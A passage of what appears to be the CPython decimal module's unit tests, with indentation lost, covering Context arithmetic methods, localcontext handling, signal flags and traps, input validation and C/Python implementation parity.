Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
